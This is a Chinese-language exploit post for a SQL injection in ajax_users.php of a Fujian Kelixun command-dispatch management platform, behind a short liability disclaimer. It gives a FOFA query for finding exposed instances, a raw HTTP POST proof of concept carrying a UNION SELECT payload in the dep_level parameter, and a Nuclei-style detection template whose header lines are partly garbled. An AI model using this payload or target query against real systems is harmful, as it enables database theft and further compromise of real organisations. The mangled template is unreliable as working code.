请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入,
攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、
写入webshell、执行系统命令以及绕过登录限制等。
fofa语法:
body="指挥调度管理平台"
POC:
POST /app/ext/ajax_users.php HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
id: fjklx_ajax_users_sqli
info:
name: fjklx_ajax_users_sqli
author: recjl
severity: high
description: description
reference:
https://
tags: tags
http:
raw:
|
POST /app/ext/ajax_users.php HTTP/1.1
Host: {{Hostname}}
max-age=0 :
1 :
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
gzip, deflate, br :
zh-CN,zh;q=0.9 :
application/x-www-form-urlencoded :
Connection: close
81 :
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
and :
matchers:
type: word
part: body
words:
c4ca4238a0b923820dcc509a6f75849b
type: status
status:
- 200